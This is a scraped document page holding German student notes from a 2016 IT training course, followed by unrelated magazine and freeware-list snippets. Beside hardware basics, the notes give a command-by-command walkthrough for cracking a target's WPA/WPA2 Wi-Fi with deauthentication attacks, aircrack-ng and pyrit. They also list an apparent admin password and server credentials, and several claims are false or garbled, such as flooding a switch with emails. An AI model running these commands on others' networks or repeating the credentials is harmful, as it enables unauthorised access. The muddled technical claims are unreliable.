Zusammenfassung Vom Unterrricht Der Cimdata Seit Dem 14

Total Page:16

File Type:pdf, Size:1020Kb

Zusammenfassung Vom Unterrricht Der Cimdata Seit Dem 14 Zusammenfassung vom Unterrricht der Cimdata seit dem 14. 3. 2016 bis zur Gegenwart: Anmerkung: Im Ordner ist ein noch höherer Informationsgehalt als hier zu lesen ist z.B. bei der Berechnung der Anzahl der Subnetze, die mit einer Subnetzmaske möglich sind. 29.3.2016 Kurze Abfrage des hardwaretechnischen Vorwissens von Markus Liebenow: Was gehört zum Main-/Motherboard? (z.B. UEFI, PCH, RAID-Controller) Was gehört zum Netzwerk? (z.B. ATX/AX; Redundanz). Redudanz = Die Tatsache, dass etwas als Information überflüssig ist. Was gehört zum Prozessor? ( z.B. L1/L2 – Cache; Kühlung; Stack Pointer (Im Steuerwerk) und sie sind von AMD und Intel) RAM? (z.B. FSB; Kapazität) SSD/HDD? (Z.B ISE und SATA1 und SATA2 und SATA3) Gehäuse? (ATX-Bauform, Mini-ATX) Präsentation vom Prozessor : Was ist er? Er ist eine elektronische Schaltung. Themen: Sockel, Firmen, (AMD/Intel); ALU; Register; L1/L2-Speicher; Kühlung; Grafik. Der Prozessor gibt als Zentralsteuerung die Nutzereingaben an die übrige Hard- und Software weiter. Sie sind microcontroller in eingebetteten Systemen. Je kleiner die Litografie, desto mehr Register hat er und leistungsfähiger ist der Prozessor! „Cache ist dafür da.“ steht in meinen handschriftl. Notizen! -Sockel von Hersteller zu Hersteller verschieden -ALU‘s; Fließkommakomponenten. -Register nicht mit A-Speicher verwechseln; keine längerfristige Ablage von Infos im Register möglich (also, im Steuerwerk). - Das Steuerwerk ist zur Ausführung von Programmcode gedacht; Stack-Pointer. - Befehlstabelle - Funktionsweise: Fetch, Decode, Fetch Operands, Execute (Von-Neumann-Zyklus). - Zuses Z1-Rechner war eine ALU eines Prozessors. ALU: 1. Fetch: Die Adresse des Maschinenbefehls wurde ins Steuerwerk gebracht und Daten in den Speicherkontroller geholt. 2. Decode: Befehlsdecoder schlüsselt Rohdaten in Maschinenbefehle auf. 3. Fetch Operands: Werte und Parameter der Befehle werden in‘s Register und die ALU geladen und Neuberechnung der Daten 4. Execute: Die Befehle werden ausgeführt. (Markus, unser Dozent, fand dies alles logisch gut erklärt.) Im Speichercontroller gibt es drei Arten von Arbeitsspeicher: L1, L2 und L3. 31.3.2016: 5 Sicherheitsregeln und Vorstellung von Programmen undWebsites: 1. Freischalten; 2. Vor Wassereinschalten sichern; 3. Erden und kurzschließen; 4.Spannungsfreiheit feststellen; 5. Benachbarte, unter Spannung stehende Teile abdecken, oder abschranken. Bei Hypervisor-Software kann Hardware zur Optimierung eingesetzt werden. Aufgaben vom Marketing: Konzepte, Analysen, instrument, Marktorientierung. Treiber direkt vom Grafikkartenhersteller runter laden. Vorstellung von Programm, von Internet-Site: Ich stellte Blog.Fefe.de vor. -Was ist Wysips-Technologie? -Bei ClipGrap ist Streamen legal. -Mit Mumin kann man allen Internet-Traffic am Gerät beobachten. -Der Windows-Remote-Desktop ist hauseigen und erlaubt den Zugriff auf einen Server. So wie Filezilla, vermutlich. - Zur IP-Verschleierung bei VPN-Tunneln kann man „Hideme“ verwenden. 6.4.2016: WLAN hacken mit Markus Liebenow: Hub = sendet alles auf alle Ports Switch = Er weiß, wo die Daten hingehen (sendet Paket an den Zielport). Wie man den Switch in den Hub-Modus schaltet? Indem man ihn mit E-Mails bombardiert! Northbridge: Kommunikationsschnittstelle zwischen Prozessor, RAM und PCIExpress (Grafik nur zu 50% wichtig .. auf der PCIExpress??). Southbridge: USB, Audio, Lsp2, Festplatten, Netzwerk und PCI (nicht PCIExpress). Beide liegen unter Kühlkörpern. Ein RAM kann, je nach Mainboard, einen Dual-Channel-Modus haben (es kann auf einem Mainboard zwei blaue, aber auch zwei schwarze, geben). Probleme zwischen Mainboard und Arbeitsspeicher? Es gibt lange Listen drüber! Man sollte beim Mainboard-Kauf gleich auf Mainboard-RAM-Kit‘s setzen! Weil, wenn ein RAM mal nur 1600 HZ haben sollte, obwohl man 2400 Hz raus holen kann, wird auf den schwächeren runter getaktet (Geschwindigkeit Hz hat nichts mit Gesamtspeicher zu tun. Das ist ein Unterschied zwischen Bussen und Frequenzen). Busse sind Leitungen auf dem Mainboard. Dort gibt es z.B. den Frontzeit-Bus. Hat er 1126 Mhz, ist dies der Taktgeber im System! Der Takt des Prozessors wird mit dem Multiplikator eingestellt. 200 Mhz FSB * Multiplikator16 = Taktrate 3,2 Gigahertz! Googlen: „Hertzzahl, Chipsatz, Bus“. Taktfrequenz und Bus-Breite (in Bit) bestimmen die Geschwindigkeit, mit denen Daten zwischen CPU und dem Chipsatz übertragen werden. Vom Prozessor (Intel i7660, oder meinem, oder dem auf Arbeit) hängt auch ab, ob er VirtualBox kann (Hyperthreading Voraussetzung). CAS = Gibt an, wieviel Daten, damit er takten kann. RAM unterliegt Tagespreisen. Man bekommt Elektronik billiger, wenn man sich ein Gewerbe anmeldet! Games nicht auf Dual-Channel machen. Mit 8 Bit kann man 256 verschiedene Zustände ar stellen. -Der Linux USB Image-Creator (unter Windows) ist ein Linux Live USB-Creator; damit war die Installation vom Kali-Linux möglich. - In einem DIV-Container unter HTML kann man rein packen, was man will und andere hacken (die Bankdaten). - WLAN hacken mit aircrack-ng. Airodump; Kismet; Airocrack. Netzwerkstick auf „Monitor“ schalten, um zu „sniffen“. Ab 5000 Paketen fängt man an zu rechnen. SSID = WLAN-Name; z.B. vom Klassen-WLAN ist die SSID „Funkturm“. Dechiffrieren (ich hatte mir dazu ein seitenlanges PDF dazu erarbeitet und brauchte nur noch jemanden für den Handshake)!! Standard-PW unter dem Kali-Linux-Live-System: „toor“. -Bruteforce-Methode: scp -P22220 /home/max/Schreibtisch/password.txt [email protected]:public_html/ Und, im Kali-Linux vom Server zum Desktop: scp -P22220 phantasy 2 @188.68.50.27:public_html/password.txt /usr/share/wordlists/ ( Was bei mir bisher klapppte: WPA-Hacking! Aber kein WEP ohne Fremdaufsicht! airmon-ng ifconfig airmon-ng start wlan0 kill 978 kill 1059 kill 1113 airmon-ng check wlan0mon airodump-ng wlan0mon airodump-ng –bssid (mac-Adresse des zu hackenden wlan‘s) -c (channel des zu hackenden wlan‘s) -w (phantasiename) wlan0mon neue shell: aireplay-ng -0 50 -a (mac-Adresse des zu hackenden wlan‘s) -c (Handshake des zu hackenden wlans, in der ersten shell in der 2. reihe mit bssid und station als 2. mac-adresse erkennbar) wlan0mon eine weile laufen lassen stoppen neue shell: crunch 8 8 0123456789 -o pw.lst (die zwei Achter .. acht Zeichen sollte auch das Passwort lang sein. Dann ist Crunch irgendwann fertig. Dann: airodump-ng –bssid (mac-Adresse des zu hackenden wlan‘s) -c (channel des zu hackenden wlan‘s) -w (phantasiename) wlan0mon wiederholen. Dann: aireplay-ng -0 50 -a (mac-Adresse des zu hackenden wlan‘s) -c (Handshake des zu hackenden wlans, in der ersten shell in der 2. reihe mit bssid und station als 2. mac-adresse erkennbar) wlan0mon wiederholen. Aircrack-ng -w pw.lst bla.cap aircrack-ng -w pw.lst (phantasiename).cap und wenn er dann beim Entschlüsseln der passphrase ist, bin ich fast fertig und kann nur hoffen, dass Kali Linux nicht schon wieder abstürzt! ) Wie es allerdings Markus genau gemacht hatte, werde ich noch mal fragen. aircrack-ng –bssid 34:81..(bssid) -a 2 -w ~/home.txt wpaaa-01.cap -a steht für attack mode und -w führt den pfad zur wordlist an. Man kann auhc den absoluten, also den ganzen, pfad eingeben. „dann noch mal Pakete mit schneiden“ airodump-ng –ssid Funkturm –channel 1 –write wlandasgehacktwird wlan0 Achtung, die Zeilen sind wahrscheinlich nicht in richtiger Reihenfolge.. Dann heißt es: Wenn Handshake da ist, den airodump-ng – Befehl abentern !! „Über den Capture lässt er die Passwörter rüberfließen“ ← was immer das heißen mag. airodump-ng -e Funkturm -n 2 -w passwort.txt maa-01.cap Die Cap-Datei wurde vorher mit airocrack erstellt. Hier, wie man wpa2 + Buchstaben cracken kann: http://brechthold.contempt-it.com/2014/01/05/wpa2-unter-kali-linux/ airmon-ng ifconfig airmon-ng start wlan0 kill 978 kill 1059 kill 1113 airmon-ng check wlan0mon airodump-ng wlan0mon airodump-ng --channel (zielchannel) --bssid (ziel-mac-adresse) --write wpa2-dump wlan0mon Auf Handshake warten neue Konsole: aireplay-ng --deauth 0 -a (ziel-mac-adresse) wlan0mon airmon-ng stop wlan0mon Dann sollten wir airodump-ng als auch den Monitor Mode unserer Karte beenden. airmon-ng stop wlan0mon ls -ahl (dann sieht man die cap-datei) pyrit -r wpa2-dump-01.cap analyze pyrit -r wpa2-dump-01.cap -o handshakes.cap strip Zeigt die Größe der neu erzeugten Datei handshakes-cap an: ls -ahl handshakes.cap pyrit -r handshakes.cap -i /usr/share/wordlists/rockyou.txt.gz attack_passthrough oder: pyrit -r handshakes.cap -i /usr/share/wordlists/password.txt attack_passthrough time pyrit -r handshakes.cap -i /usr/share/wordlists/rockyou.txt.gz attack_passthrough Dann sollte das Passwort, dass ganz vorne in der Liste steht (beim einfachen testen) schon geknackt sein. Das war es auch. Zum Testen nächste Woche, mit Markus, wird das auch ausreichen. Es geht weiter mit: pyrit -i /wordlists/FULLlist.txt import_passwords Wenn man das Cracktool Pyrit auf Kali-Linux verwendet,, lohnt es sich auch noch, eine starke Grafikkarte im Gepäck zu haben! Mehr geben meine Notizen nicht mehr her! - Die Kunst der Täuschung von Kevin Mitnick (Social Engeneering) Sousal endschaing 11.4.2016: USB-Stick machen: WIN USB-CD; Stick: *.iso; PC benötigt. Greasemonkey: Browsererweiterung, um Browser als Client manipulieren zu können. Netzwerk von der Cimdata GmbH: \\192.168.0.1 Admin-PW: Cimdata3258 -Guter Virenscanner ist z.B. es/et. -PCI und PCIExpresss-Unterschied. -Mainboard-Versionen(ATX; Mini-ATX) -Unter 600 Watt kein Netzteil kaufen. -Intel i5 1750k. Das k steht dabei für Multiplikator, also, dass man diesen Prozessor takten kann.
Recommended publications
  • Amateur Computer Group of New Jersey NEWS Volume 39, Number 01 January 2014
    Amateur Computer Group of New Jersey NEWS Volume 39, Number 01 January 2014 Main Meeting/Election Report ACGNJ Meetings Brenda Bell, ACGNJ For the very latest news on ACGNJ meetings, please On December 6, 2013, we held our Annual Business visit the ACGNJ Website (www.acgnj.org). Meeting, with 8 persons attending. Having reached a Board of Directors Meeting: December 31, 7:00 PM quorum, the meeting was called to order at 9:09 PM. MOVED to Friday, January 3, 7:00 PM. Mike Redlich presented a President's Report. (Due to the New Year's Holiday) Malthi Masurekar presented a Treasurer's Report. Board of Directors Meeting: Friday, Jan 3, 7:00 PM Several topics were raised for discussion, including Mike Redlich (president (at) acgnj.org) membership issues and outreach to other clubs. Main Meeting: Friday, January 3. 8:00 PM Election results. Without discussion, and with no Mike Redlich (president (at) acgnj.org) additional candidates being nominated for our two Lunics (Linux/UNIX): Monday, January 6, 8:00 PM still open Director positions, John Raff moved that Andreas Meyer (lunics (at) acgnj.org) the Secretary cast one vote for the pat slate. The Investing: Thursday, January 9, 8:00 PM motion was seconded and carried. Jim Cooper (jim (at) thecoopers.org). President: Michael Redlich NJ Gamers: Friday, January 10, 6:00 PM Vice-President: Wendy Bell Gregg McCarthy (greggmajestic (at) gmail.com) Secretary: Brenda Bell Treasurer: Malthi Masurekar Layman’s Forum: Monday, January 13, 8:00 PM Directors (Two year term, through end of 2015): Matt Skoda (som359 (at) gmail.com) Gregg McCarthy Java: Tuesday, January 14, 7:30 PM John Raff Mike Redlich (mike (at) redlich.net) Frank Warren Window Pains: Friday, January 17, 7:00 PM Directors (From last year, through end of 2014): !!!WARNING!!! This meeting will NOT be held in Bob Hawes our usual location.
    [Show full text]
  • Vírustámadások Első Mp-Ei
    DVD DVD 36 03 Friss 9 GB Adatai örökre biztonságban R 2010 A LEGÚJABB DRIVEREK, HASZNOS PROGRAMOK, A HÓNAP JÁTÉKAI, EXKLUZÍV CSOMAgok… HDD, DVD vagy a világháló? Eláruljuk a mentés legokosabb módját A legolcsóbb R 52 mobil internet Tippek & trükkök, tarifák és egy GO DIGITAL! verhetetlen ajánlat 2010/03 _ CHIPONLINE.HU Microsoft & CHIP R 30 Support-DVD WINDO WS Plusz: Windows 7 indulócsomag 32 vagy 64 bit? Nincs több driver- és Csúcsteljesítmény 0 Ft-ért. Váltson most, és élvezze szoftverkonfliktus! egyből az előnyöket. Eszközeinkkel könnyen megy! Ezek az eszközök elemzik és megjavítják a rendszerét – teljesen automatikusan! Vírustámadások LASSÍTOTT Garantált FELVÉTEL 100%-os első mp-ei ÚJ ROVAT eltávolítás Megmutatjuk: mire képes a kártevő a számítógépén, miközben ön mit sem sejt R 48 Ingyen számítógép a webről A CHIP most átadja önnek a legerősebb és leggyorsabb online PC-t R 16 Registry Mechanic 8 Rejtett funkciók Több száz hibát javít pillanatok alatt a világ legjobb pucolója hardvereiben Sok készülék sokkal többet tud, mint gondolnánk 1995 Ft, előfizetéssel 1395 Ft XXII. évfolyam, 3. szám, 2010. március Cikkünkben: hiányzó funkciók zseniálisan pótolva R 102 Most váltson 64 Most váltson bitre >> PC mindig önnel >> >> >> videokamera 2010 Életmentő DSLR Adatbiztonság csomag kontra a >> Win7-hez Mobil update >> meg 2010 >> internet Találja a újra Office mobilját >> Virtuális XP Win7 alatt a >> HD Üdvözöljük világában! Kiadja a Motor-Presse Budapest Lapkiadó Kft. CD CD 03 melléklettel Így szerezhet INGYEN PC-t R 16 2010 EXKLUZÍV CSOMAGOK,
    [Show full text]
  • Freeware-List.Pdf
    FreeWare List A list free software from www.neowin.net a great forum with high amount of members! Full of information and questions posted are normally answered very quickly 3D Graphics: 3DVia http://www.3dvia.com...re/3dvia-shape/ Anim8or - http://www.anim8or.com/ Art Of Illusion - http://www.artofillusion.org/ Blender - http://www.blender3d.org/ CreaToon http://www.creatoon.com/index.php DAZ Studio - http://www.daz3d.com/program/studio/ Freestyle - http://freestyle.sourceforge.net/ Gelato - http://www.nvidia.co...ge/gz_home.html K-3D http://www.k-3d.org/wiki/Main_Page Kerkythea http://www.kerkythea...oomla/index.php Now3D - http://digilander.li...ng/homepage.htm OpenFX - http://www.openfx.org OpenStages http://www.openstages.co.uk/ Pointshop 3D - http://graphics.ethz...loadPS3D20.html POV-Ray - http://www.povray.org/ SketchUp - http://sketchup.google.com/ Sweet Home 3D http://sweethome3d.sourceforge.net/ Toxic - http://www.toxicengine.org/ Wings 3D - http://www.wings3d.com/ Anti-Virus: a-squared - http://www.emsisoft..../software/free/ Avast - http://www.avast.com...ast_4_home.html AVG - http://free.grisoft.com/ Avira AntiVir - http://www.free-av.com/ BitDefender - http://www.softpedia...e-Edition.shtml ClamWin - http://www.clamwin.com/ Microsoft Security Essentials http://www.microsoft...ity_essentials/ Anti-Spyware: Ad-aware SE Personal - http://www.lavasoft....se_personal.php GeSWall http://www.gentlesec...m/download.html Hijackthis - http://www.softpedia...ijackThis.shtml IObit Security 360 http://www.iobit.com/beta.html Malwarebytes'
    [Show full text]
  • Free Disk Space in Mac Os X
    Free disk space in mac os x To really free up disk space on your Mac's hard drive, you're going to need to Mac OS X tries to automatically remove temporary files, but a. Ever wonder how much free space is available on your Mac's hard disk or partitions? It's easy to check in OS X. Plus, if your Mac is running Mac. Optimized Storage in macOS Sierra and later can save space by storing your content You'll see an overview of your free space and the space used by different Move your pointer over the file name, then click the x button. Mac running out of disk space? Maybe you don't have room for installing a new app, backing up a device, copying some files, or much of. on your Mac? These 10 tips can help you free up space you didn't know you were even using! . Service files and app remnants can eat up terrible amounts of disk space. This is bad if . How To Completely Uninstall Software under Mac OS X [MacRx] iPhone X won't reveal your lock screen notifications to anyone else. Disk Inventory X, disk usage utility for Mac OS X. If you've ever wondered where all your disk space has gone, Disk Inventory X will help you to answer this. DaisyDisk is a disk analyzer tool for OS X that visualizes hard disk usage and allows to free up hard disk space. After the break we'll look at the most efficient ways to free up space on your Mac.
    [Show full text]
  • File Management
    File Management Qi Wang “Managing your Research Data: Best practices in Research Data Management for Biological Sciences” 2021 Mar 19 Outline ● Data Management Principles ● Research Data Life-cycle ● Data Management Checklist ● Techniques to help organize your research data ● File Organization ● File Naming ● Version Control ● Metadata (ReadMe) ● Running Low on Storage Space? Outline ● Data Management Principles ● Research Data Life-cycle ● Data Management Checklist ● Techniques to help organize your research data ● File Organization ● File Naming ● Version Control ● Metadata (ReadMe) ● Running Low on Storage Space? Research Data Life-cycle DOI: 10.1007/s10606-019-09354-z Outline ● Data Management Principles ● Research Data Life-cycle ● Data Management Checklist ● Techniques to help organize your research data ● File Organization ● File Naming ● Version Control ● Metadata (ReadMe) ● Running Low on Storage Space? Data Management Checklist • What types of data? • Who will be responsible for each aspect of DM? ● Roles & Responsibilities • How – collect/document/store/back up/share data ● Restrictions? ● Ethical Obligations & Copyright/Intellectual Property ● Privacy and Data-processing Laws ● Wet lab: Electronic Lab Notebook (ELN) Based on slide from Jing Su Data Types Recommended by UK Data Archive Type of data Recommended formats Tabular data with extensive metadata SPSS portable format (.por) variable labels, code labels, and defined delimited text and command ('setup') file (SPSS, Stata, SAS, etc.) missing values structured text or mark-up
    [Show full text]
  • Processing Internal Hard Drives
    Processing Internal Hard Drives Amy F. Brown Ohio State Chloë Edwards Mississippi Department of Archives and History Meg Eastwood Northern Arizona University Martha Tenney Barnard College Kevin O’Donnell University of Texas at Austin As archives receive born digital materials more and more frequently, the challenge of dealing with a variety of hardware and formats is becoming omnipresent. This paper outlines a case study that provides a practical, step-by-step guide to archiving files on legacy hard drives dating from the early 1990s to the mid-2000s. The project used a digital forensics approach to provide access to the contents of the hard drives without compromising the integrity of the files. Relying largely on open source software, the project imaged each hard drive in its entirety, then identified folders and individual files of potential high use for upload to the University of Texas Digital Repository. The project also experimented with data visualizations in order to provide researchers who would not have access to the full disk images—a sense of the contents and context of the full drives. The greatest challenge philosophically was answering the question of whether scholars should be able to view deleted materials on the drives that donors may not have realized were accessible. Introduction Project introduction This case study is the result of a project undertaken in Dr. Patricia Galloway’s Digital Archiving and Preservation course at the University of Texas at Austin’s School of Information in the spring semester of 2012. The authors were assigned the semester- long project of recovering the content of eleven internal hard drives in two collections held by the Dolph Briscoe Center for American History (BCAH), and preparing those materials for ingest into the BCAH’s space on the University of Texas Digital Repository (UTDR).
    [Show full text]
  • Hiren's Bootcd Berbentuk Iso File Dan Harus Di Burning Ke CD Dan Bisa Anda Jalankan Melalui Met Ode Boot Atau Explore
    Hiren's BootCD berbentuk iso file dan harus di burning ke CD dan bisa anda jalankan melalui met ode boot atau explore. salah satu software penting untuk merecovery data karena software ini juga memiliki mini windows yg di jalankan pada bootable. Selanjutnya lihat saja review yg saya ambil dari websitenya, www.hirensbootcd.or g. seperti di bawah ini. Antivirus Tools Avira AntiVir Personal (11-04-2011): Free anti-virus and anti-spyware on-demand scanner, detects and removes more than 50000 viruses and trojans (Windows Freewa re). ComboFix (11-04-2011): Designed to cleanup malware infections and restore settin gs modified by malware (Windows Freeware). Dr.Web CureIt! Antivirus (11-04-2011): A free standalone anti-virus and anti-spy ware on-demand scanner (Windows Freeware). GMER 1.0.15: Hidden services, hidden registry, hidden file scanner, Rootkit Dete ctor and Remover (Windows Freeware). Malwarebytes Anti-Malware 1.50.1 (11-04-2011): Anti-malware application that can thoroughly remove even the most advanced malware (Windows Freeware). Remove Fake Antivirus 1.76: A tool to remove virus/malware which disguises itsel f to be an antivirus and produces fake alert/warnings and urge you to purchase a useless copy of the fake antivirus (Windows Freeware). RootkitRevealer 1.7.1: Rootkit Revealer is an advanced patent-pending root kit d etection utility (Windows Freeware). Spybot Search & Destroy 1.6.2 (11-04-2011): Application to scan for spyware, adw are, hijackers and other malicious software (Windows Freeware). SpywareBlaster 4.4 (11-04-2011): Prevent the installation of spyware and other p otentially unwanted software (Windows Freeware).
    [Show full text]
  • PS Package Management Packages 24-APR-2016 Page 1 Acmesharp-Posh-All 0.8.1.0 Chocolatey Powershell Module to Talk to Let's Encrypt CA and Other ACME Serve
    Name Version Source Summary ---- ------- ------ ------- 0ad 0.0.20 chocolatey Open-source, cross-platform, real-time strategy (RTS) game of anci... 0install 2.10.0 chocolatey Decentralised cross-distribution software installation system 0install.install 2.10.0 chocolatey Decentralised cross-distribution software installation system 0install.install 2.10.0 chocolatey Decentralised cross-distribution software installation system 0install.portable 2.10.0 chocolatey Decentralised cross-distribution software installation system 1password 4.6.0.603 chocolatey 1Password - Have you ever forgotten a password? 1password-desktoplauncher 1.0.0.20150826 chocolatey Launch 1Password from the desktop (CTRL + Backslash). 2gis 3.14.12.0 chocolatey 2GIS - Offline maps and business listings 360ts 5.2.0.1074 chocolatey A feature-packed software solution that provides users with a powe... 3PAR-Powershell 0.4.0 PSGallery Powershell module for working with HP 3PAR StoreServ array 4t-tray-minimizer 5.52 chocolatey 4t Tray Minimizer is a lightweight but powerful window manager, wh... 7KAA 2.14.15 chocolatey Seven Kingdoms is a classic strategy game. War, Economy, Diplomacy... 7-taskbar-tweaker 5.1 chocolatey 7+ Taskbar Tweaker allows you to configure various aspects of the ... 7zip 15.14 chocolatey 7-Zip is a file archiver with a high compression ratio. 7zip.commandline 15.14 chocolatey 7-Zip is a file archiver with a high compression ratio. 7zip.install 15.14 chocolatey 7-Zip is a file archiver with a high compression ratio. 7Zip4Powershell 1.3.0 PSGallery Powershell module for creating and extracting 7-Zip archives aacgain 1.9.0.2 chocolatey aacgain normalizes the volume of digital music files using the..
    [Show full text]
  • Announcement
    Announcement Total 69 articles, created at 2016-03-25 18:03 1 Choosing Between Apple's 9.7-Inch Tablets: iPad Air 2 vs. iPad Pro (2.00/3) The new iPad Pro has the same size screen as the already-available iPad Air 2. We highlight key differences and similarities between Apple's two 9.7-inch iPads. 2016-03-25 12:33 1KB www.eweek.com 2 Admitting to throttling video, Netflix now promises more control for users (2.00/3) Netflix admitted to throttling video streams worldwide for its mobile users, but said it hasn't been an issue for customers. 2016-03-25 03:19 3KB www.computerworld.com 3 Lyft drivers lawsuit may end without addressing worker reclassification A lawsuit filed by drivers against Lyft may not address the key and contentious issue of (2.00/3) whether the drivers should be reclassified as employees with all the attendant benefits. 2016-03-25 00:33 3KB www.itworld.com 4 Hulu's Gear VR app has Netflix beat in a few big ways Your subscription is about to get you so much more 2016-03-24 19:30 2KB (2.00/3) feedproxy.google.com 5 AI is coming, so we'd better start preparing for it Francois Tung of law firm Pinsent Masons examines the legal implications of rapidly improving artificial intelligence,Cloud and Infrastructure,Software,Legislation and Regulation ,Artificial Intelligence,Machine Learning,Pinsent Masons 2016-03-25 18:03 1004Bytes www.computing.co.uk 6 Real-time visibility With an all-in-one solution, you can get a broad and specific view of what is happening in your contact centre -- and 2016-03-25 12:05 704Bytes www.itworldcanada.com 7 Can I limit what my friends see on Facebook? Control your Facebook visibility for some or all your friends Social media is always growing and privacy is becoming increasingly important.
    [Show full text]
  • Szoftverekre Van Szüksége, Ha a Mozi Minden Játékot Felülmúlt a Sikere Után Otthon Is Élvezni Szeretné Ezt Az Új Típusú Szórakozást
    DVD DVD Így fog mindent lejátszani a PC-je 06 Friss 9 GB 2010 A LEGÚJABB DRIVEREK, HASZNOS PROGRAMOK, Film- és zenekonvertálás: bármilyen formátumba egyetlen kattintással 40 A HÓNAP JÁTÉKAI, EXKLUZÍV CSOMAgok… R Melyik most a legjobb VGA?R 64 Tesztünkben az összes új Radeon GO DIGITAL! és GeForce kártya 2010/06 _ CHIPONLINE.HU Windows 7 PRÉMIUM A legjobb programok: biztonság, kényelem, sebesség, multimédia Ajándék! a EXKLUZÍV: Windowsnak TESZTgyőzTES Így működik minden PC-n – próbálja ki ön is! R 26 a DVD-n! A DVD-n: prémium eszközök XP-hez és Win7-hez Privát adatai 6 hónapig ingyen – csak a CHIP olvasóinak biztonságban R 91 A DVD-n: vadonatúj NOD32 tűzfallal & spamszűrővel Új csapdák az online bankolásnál Social attacks, man in the middle, EC-hack: hogyan védje pénzét a támadásoktól R 34 Tökéletes fotók R 72 Zajok, torzítás és színhiba – egy gombnyomással javítva 1995 Ft, előfizetéssel 1395 Ft XXII. évfolyam, 6. szám, 2010. június 11 top teljes változat a DVD-n Ajándék 3D a Windowsnak >> Kifelé webvárosból Ajándék >> 11-e teszt >> 3D 3D >> A a tévé Top Bankszámlánk >> védelme Windows >> Windowsnak webvárosból Kifelé >> Színes digitális Filmek könyvek >> és A zenék konvertálása legújabb HD ajánlatok >> DirectX 11: vs. Nvidia Ati kicsi >> ár Nagy tévé, Kiadja a Motor-Presse Budapest Lapkiadó Kft. CD CD Így fog mindent lejátszani a PC-je 06 2010 melléklettel EXKLUZÍV CSOMAGOK, FRISS Film- és zenekonvertálás: bármilyen formátumba egyetlen kattintással 40 PROGRAMOK, VÍRUSVÉDELEM... R Tökéletes FOTÓK Zajok, torzítás, színhibák – egyetlen GO
    [Show full text]